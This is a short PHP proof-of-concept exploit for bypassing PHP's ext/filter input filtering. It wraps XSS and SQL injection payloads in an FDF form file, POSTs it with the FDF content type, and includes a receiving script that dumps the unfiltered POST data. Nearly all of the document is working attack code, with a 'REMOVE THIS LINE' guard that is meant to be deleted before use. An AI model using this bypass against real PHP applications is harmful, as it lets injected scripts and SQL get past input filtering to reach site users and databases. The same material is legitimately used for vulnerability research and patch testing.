////////////////////////////////////////////////////////////////////////
// PHP ext/filtet FDF POST Filter Bybass Exploit //
////////////////////////////////////////////////////////////////////////
// This is meant as a protection against remote file inclusion.
die("REMOVE THIS LINE");
// _POST is the array that will be sent to the url in $url
$_POST = array();
$_POST['var1'] = "<script>alert(/XSS/);</script>";
$_POST['var2'] = " ' UNION SELECT ";
$url = "http://127.0.0.1/info.php";
// You do not need to change anything below this
$outfdf = fdf_create();
foreach ($_POST as $key => $value) {
fdf_set_value($outfdf, $key, $value, 0);
}
fdf_save($outfdf, "outtest.fdf");
fdf_close($outfdf);
$ret = file_get_contents("outtest.fdf");
unlink("outtest.fdf");
$params = array('http' => array('method' => 'POST', 'content' => $ret, 'header' => 'Content-Type: application/vnd.fdf'));
$ctx = stream_context_create($params);
$fp = @fopen($url, 'rb', false, $ctx);
if (!$fp) {
die("Cannot open {$url}");
}
$response = @stream_get_contents($fp);
echo $response;
echo "\n";
?>
<?php
ob_start();
var_dump($_POST);
$content = ob_get_contents();
error_log($content);
ob_end_clean();
print $content;
die;
// ouput an empty FPF file
$outfdf = fdf_create();
$tmpname = tempnam('../temp', "FDF_");
fdf_set_status($outfdf, "Thank you!");
fdf_save($outfdf, $tmpname);
fdf_close($outfdf);
fdf_header();
$fp = fopen($tmpname, "r");
fpassthru($fp);
unlink($tmpname);
